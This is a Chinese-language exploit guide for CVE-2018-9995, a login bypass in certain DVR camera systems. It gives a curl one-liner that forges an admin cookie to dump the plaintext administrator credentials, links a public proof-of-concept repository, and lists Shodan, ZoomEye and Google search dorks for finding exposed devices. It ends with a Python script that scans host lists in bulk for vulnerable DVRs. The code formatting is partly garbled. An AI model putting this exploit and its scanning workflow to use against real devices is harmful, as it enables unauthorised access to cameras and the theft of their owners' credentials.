DVR登录绕过漏洞(CVE-2018-9995)

###漏洞描述

此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板，返回此设备的明文管理员凭证。

###漏洞利用

1.利用代码

?

1	curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

2.poc利用

?

1 2 3 4 5 6

https://github.com/ezelf/CVE-2018-9995_dvr_credentials git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git   cd CVE-2018-9995_dvr_credentials   pip install -r requirements.txt

 

 

 

 

 

###关键词搜索

1. zoomeye:

 keyword: “/login.rsp"

 

 

 

2.shodan:

keyword:html:"/login.rsp"

keyword:"server:GNU rsp/1.0"

 

 

 

 

3.google:

keyword:intitle:"DVR login"

 

 

 

 

 

###批量验证

DVR系列摄像头批量检测 使用方法:python CVE-2018-9995_check.py host.txt
其中host.txt内容可以为8.8.8.8:8080或者www.baidu.com，脚本运行后对使用了DVR系列摄像头的host会保存到result.txt文件里

 

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63

#author:hzkey   import tableprint as tp   import sys   import requests   import re   class Colors:       GREEN = '\033[32m'       RED = '\033[0;31m'       BLUE = '\033[*]'       ORANGE = '\033[33m'   def check_host(host):       try:           print(Colors.ORANGE+"Checking : %s"%host)           url = 'http://' + host+'/login.rsp'           rr= requests.get(url,timeout=30,allow_redirects=False)           if rr.status_code == 200 and re.findall("GNU rsp/1.0", rr.headers["Server"]):               print(Colors.GREEN+"[*] CVE-2018-9995 Detection :Url is %s"%url)               ff=open('result.txt','a+')               ff.write('%s\n'%(url))       except:           pass   if __name__ == '__main__':       if len(sys.argv) < 2:           print(Colors.BLUE+"""Usage: Python3 CVE-2018-9995.py host.txt   host.txt:127.0.0.1:8080 or baidu.com   """)       if len(sys.argv) >= 2:           file = open(sys.argv[1])           for i in file:               i = i.strip()               check_host(i)           file.close()